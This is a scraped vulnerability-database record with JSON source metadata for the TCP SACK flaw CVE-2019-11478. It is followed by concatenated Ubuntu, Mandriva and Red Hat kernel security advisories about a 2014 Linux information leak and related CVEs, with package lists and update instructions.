        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9213"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9213"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10167"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10166"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10168"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10161"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10161"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10167"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "db": "BID",
        "id": "108798"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153319"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153317"
      },
      {
        "db": "PACKETSTORM",
        "id": "153322"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153325"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "db": "BID",
        "id": "108798"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153319"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153317"
      },
      {
        "db": "PACKETSTORM",
        "id": "153322"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153325"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-20T00:00:00",
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "date": "2019-06-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "date": "2019-06-17T00:00:00",
        "db": "BID",
        "id": "108798"
      },
      {
        "date": "2019-06-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "date": "2019-06-17T19:16:05",
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "date": "2019-06-17T19:16:28",
        "db": "PACKETSTORM",
        "id": "153319"
      },
      {
        "date": "2019-10-23T18:32:10",
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "date": "2019-06-17T19:16:14",
        "db": "PACKETSTORM",
        "id": "153317"
      },
      {
        "date": "2019-06-18T15:43:26",
        "db": "PACKETSTORM",
        "id": "153322"
      },
      {
        "date": "2019-06-18T15:43:49",
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "date": "2019-06-18T15:43:16",
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "date": "2019-06-18T15:43:55",
        "db": "PACKETSTORM",
        "id": "153325"
      },
      {
        "date": "2019-07-08T14:38:09",
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "date": "2019-06-25T23:49:17",
        "db": "PACKETSTORM",
        "id": "153424"
      },
      {
        "date": "2019-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      },
      {
        "date": "2019-06-19T00:15:12.687000",
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-07-08T00:00:00",
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "date": "2020-10-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "date": "2019-07-12T11:00:00",
        "db": "BID",
        "id": "108798"
      },
      {
        "date": "2019-09-11T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "date": "2021-12-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      },
      {
        "date": "2024-02-27T21:04:17.560000",
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      }
    ],
    "trust": 0.6
  }
}

var-201406-0230
Vulnerability from variot

The rd_build_device_space function in drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not properly initialize a certain data structure, which allows local users to obtain sensitive information from ramdisk_mcp memory by leveraging access to a SCSI initiator. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability is due to the fact that the program does not initialize the data structure correctly. ============================================================================ Ubuntu Security Notice USN-2336-1 September 02, 2014

linux-lts-trusty vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux-lts-trusty: Linux hardware enablement kernel from Trusty

Details:

A flaw was discovered in the Linux kernel virtual machine's (kvm) validation of interrupt requests (irq). A guest OS user could exploit this flaw to cause a denial of service (host OS crash). (CVE-2014-0155)

Andy Lutomirski discovered a flaw in the authorization of netlink socket operations when a socket is passed to a process of more privilege. (CVE-2014-0181)

An information leak was discovered in the Linux kernels aio_read_events_ring function. (CVE-2014-4027)

Sasha Levin reported an issue with the Linux kernel's shared memory subsystem when used with range notifications and hole punching. (CVE-2014-4171)

Toralf F=C3=B6rster reported an error in the Linux kernels syscall auditing on 32 bit x86 platforms. (CVE-2014-4667)

Vasily Averin discover a reference count flaw during attempts to umount in conjunction with a symlink. (CVE-2014-5045)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: linux-image-3.13.0-35-generic 3.13.0-35.62~precise1 linux-image-3.13.0-35-generic-lpae 3.13.0-35.62~precise1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Mandriva Linux Security Advisory MDVSA-2014:155 http://www.mandriva.com/en/support/security/


Package : kernel Date : August 7, 2014 Affected: Business Server 1.0


Problem Description:

Multiple vulnerabilities has been found and corrected in the Linux kernel:

Multiple buffer overflows in drivers/staging/wlags49_h2/wl_priv.c in the Linux kernel before 3.12 allow local users to cause a denial of service or possibly have unspecified other impact by leveraging the CAP_NET_ADMIN capability and providing a long station-name string, related to the (1) wvlan_uil_put_info and (2) wvlan_set_station_nickname functions (CVE-2013-4514).

The Linux kernel before 3.15.4 on Intel processors does not properly restrict use of a non-canonical value for the saved RIP address in the case of a system call that does not use IRET, which allows local users to leverage a race condition and gain privileges, or cause a denial of service (double fault), via a crafted application that makes ptrace and fork system calls (CVE-2014-4699). The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com


Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFT4yfXmqjQ0CJFipgRAuk5AKDbuUKogDrhb4iKIs1yOP4IQdpAcwCgodf8 OMQTfJFCDxSAMSI8iUevOkc= =mxBf -----END PGP SIGNATURE----- . (CVE-2014-4943)

Michael S. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2014:1971-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1971.html Issue date: 2014-12-09 CVE Names: CVE-2013-2929 CVE-2014-1739 CVE-2014-3181 CVE-2014-3182 CVE-2014-3184 CVE-2014-3185 CVE-2014-3186 CVE-2014-3631 CVE-2014-3673 CVE-2014-3687 CVE-2014-3688 CVE-2014-4027 CVE-2014-4652 CVE-2014-4654 CVE-2014-4655 CVE-2014-4656 CVE-2014-5045 CVE-2014-6410 =====================================================================

  1. Summary:

Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

The kernel packages contain the Linux kernel, the core of any Linux operating system.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

  1. Description:

  2. A flaw was found in the way the Linux kernel's SCTP implementation handled malformed or duplicate Address Configuration Change Chunks (ASCONF). A remote attacker could use either of these flaws to crash the system. (CVE-2014-3673, CVE-2014-3687, Important)

  3. A flaw was found in the way the Linux kernel's SCTP implementation handled the association's output queue. A remote attacker could send specially crafted packets that would cause the system to use an excessive amount of memory, leading to a denial of service. (CVE-2014-3688, Important)

  4. Two flaws were found in the way the Apple Magic Mouse/Trackpad multi-touch driver and the Minibox PicoLCD driver handled invalid HID reports. An attacker with physical access to the system could use these flaws to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)

  5. A memory corruption flaw was found in the way the USB ConnectTech WhiteHEAT serial driver processed completion commands sent via USB Request Blocks buffers. An attacker with physical access to the system could use this flaw to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-3185, Moderate)

  6. A flaw was found in the way the Linux kernel's keys subsystem handled the termination condition in the associative array garbage collection functionality. A local, unprivileged user could use this flaw to crash the system. (CVE-2014-3631, Moderate)

  7. Multiple flaws were found in the way the Linux kernel's ALSA implementation handled user controls. A local, privileged user could use either of these flaws to crash the system. (CVE-2014-4654, CVE-2014-4655, CVE-2014-4656, Moderate)

  8. A flaw was found in the way the Linux kernel's VFS subsystem handled reference counting when performing unmount operations on symbolic links. A local, unprivileged user could use this flaw to exhaust all available memory on the system or, potentially, trigger a use-after-free error, resulting in a system crash or privilege escalation. (CVE-2014-5045, Moderate)

  9. A flaw was found in the way the get_dumpable() function return value was interpreted in the ptrace subsystem of the Linux kernel. When 'fs.suid_dumpable' was set to 2, a local, unprivileged local user could use this flaw to bypass intended ptrace restrictions and obtain potentially sensitive information. (CVE-2013-2929, Low)

  10. A stack overflow flaw caused by infinite recursion was found in the way the Linux kernel's UDF file system implementation processed indirect ICBs. An attacker with physical access to the system could use a specially crafted UDF image to crash the system. (CVE-2014-1739, Low)

  11. An out-of-bounds read flaw in the Logitech Unifying receiver driver could allow an attacker with physical access to the system to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-3182, Low)

  12. Multiple out-of-bounds write flaws were found in the way the Cherry Cymotion keyboard driver, KYE/Genius device drivers, Logitech device drivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote control driver, and Sunplus wireless desktop driver handled invalid HID reports. An attacker with physical access to the system could use either of these flaws to write data past an allocated memory buffer. (CVE-2014-3184, Low)

  13. An information leak flaw was found in the RAM Disks Memory Copy (rd_mcp) back end driver of the iSCSI Target subsystem could allow a privileged user to leak the contents of kernel memory to an iSCSI initiator remote client. (CVE-2014-4652, Low)

  14. Solution:

Red Hat would like to thank Frey Alfredsson for reporting CVE-2014-3631, and Vasily Averin of Parallels for reporting CVE-2014-5045. The CVE-2014-3673 was discovered by Liu Wei of Red Hat.

All kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1028148 - CVE-2013-2929 kernel: exec/ptrace: get_dumpable() incorrect tests 1108744 - CVE-2014-4027 Kernel: target/rd: imformation leakage 1109774 - CVE-2014-1739 Kernel: drivers: media: an information leakage 1113406 - CVE-2014-4652 Kernel: ALSA: control: protect user controls against races & memory disclosure 1113445 - CVE-2014-4654 CVE-2014-4655 Kernel: ALSA: control: use-after-free in replacing user controls 1113470 - CVE-2014-4656 Kernel: ALSA: control: integer overflow in id.index & id.numid 1122472 - CVE-2014-5045 kernel: vfs: refcount issues during unmount on symlink 1140325 - CVE-2014-3631 kernel: keys: incorrect termination condition in assoc array garbage collection 1141173 - CVE-2014-3181 Kernel: HID: OOB write in magicmouse driver 1141210 - CVE-2014-3182 Kernel: HID: logitech-dj OOB array access 1141391 - CVE-2014-3184 Kernel: HID: off by one error in various _report_fixup routines 1141400 - CVE-2014-3185 Kernel: USB serial: memory corruption flaw 1141407 - CVE-2014-3186 Kernel: HID: memory corruption via OOB write 1141809 - CVE-2014-6410 kernel: udf: Avoid infinite loop when processing indirect ICBs 1147850 - CVE-2014-3673 kernel: sctp: skb_over_panic when receiving malformed ASCONF chunks 1155731 - CVE-2014-3687 kernel: net: sctp: fix panic on duplicate ASCONF chunks 1155745 - CVE-2014-3688 kernel: net: sctp: remote memory pressure from excessive queueing

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-123.13.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm

x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm

x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-123.13.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm

x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm

x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-123.13.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm

ppc64: kernel-3.10.0-123.13.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-123.13.1.el7.ppc64.rpm kernel-debug-3.10.0-123.13.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm kernel-devel-3.10.0-123.13.1.el7.ppc64.rpm kernel-headers-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.ppc64.rpm perf-3.10.0-123.13.1.el7.ppc64.rpm perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm

s390x: kernel-3.10.0-123.13.1.el7.s390x.rpm kernel-debug-3.10.0-123.13.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debug-devel-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm kernel-devel-3.10.0-123.13.1.el7.s390x.rpm kernel-headers-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-123.13.1.el7.s390x.rpm perf-3.10.0-123.13.1.el7.s390x.rpm perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm

x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm

ppc64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.ppc64.rpm perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm python-perf-3.10.0-123.13.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm

s390x: kernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm python-perf-3.10.0-123.13.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm

x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-123.13.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm

x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm

x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2013-2929 https://access.redhat.com/security/cve/CVE-2014-1739 https://access.redhat.com/security/cve/CVE-2014-3181 https://access.redhat.com/security/cve/CVE-2014-3182 https://access.redhat.com/security/cve/CVE-2014-3184 https://access.redhat.com/security/cve/CVE-2014-3185 https://access.redhat.com/security/cve/CVE-2014-3186 https://access.redhat.com/security/cve/CVE-2014-3631 https://access.redhat.com/security/cve/CVE-2014-3673 https://access.redhat.com/security/cve/CVE-2014-3687 https://access.redhat.com/security/cve/CVE-2014-3688 https://access.redhat.com/security/cve/CVE-2014-4027 https://access.redhat.com/security/cve/CVE-2014-4652 https://access.redhat.com/security/cve/CVE-2014-4654 https://access.redhat.com/security/cve/CVE-2014-4655 https://access.redhat.com/security/cve/CVE-2014-4656 https://access.redhat.com/security/cve/CVE-2014-5045 https://access.redhat.com/security/cve/CVE-2014-6410 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFUh2CJXlSAg2UNWIIRArzSAJ95AhqaUI998VyNBJGQaTXfSHeJuQCdFjTp 6IsJOT0XYi+TiyneMDOm9f4= =a0Ai -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Relevant releases/architectures:

MRG Realtime for RHEL 6 Server v.2 - noarch, x86_64

  1. (CVE-2014-3153, Important)

  2. It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. (CVE-2014-4699, Important)

Note: The CVE-2014-4699 issue only affected systems using an Intel CPU.

  • It was found that the permission checks performed by the Linux kernel when a netlink message was received were not sufficient. (CVE-2014-0181, Moderate)

  • It was found that the aio_read_events_ring() function of the Linux kernel's Asynchronous I/O (AIO) subsystem did not properly sanitize the AIO ring head received from user space. (CVE-2014-0206, Moderate)

  • An out-of-bounds memory access flaw was found in the Netlink Attribute extension of the Berkeley Packet Filter (BPF) interpreter functionality in the Linux kernel's networking implementation. Google acknowledges Pinkie Pie as the original reporter of CVE-2014-3153. Bugs fixed (https://bugzilla.redhat.com/):

1094265 - CVE-2014-0181 kernel: net: insufficient permision checks of netlink messages 1094602 - CVE-2014-0206 kernel: aio: insufficient sanitization of head in aio_read_events_ring() 1096775 - CVE-2014-3144 CVE-2014-3145 Kernel: filter: prevent nla extensions to peek beyond the end of the message 1102571 - CVE-2014-3917 kernel: DoS with syscall auditing 1103626 - CVE-2014-3153 kernel: futex: pi futexes requeue issue 1104097 - CVE-2014-3940 Kernel: missing check during hugepage migration 1108744 - CVE-2014-4027 Kernel: target/rd: imformation leakage 1113967 - CVE-2014-4667 kernel: sctp: sk_ack_backlog wrap-around problem 1115927 - CVE-2014-4699 kernel: x86_64: ptrace: sysret to non-canonical address

6

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
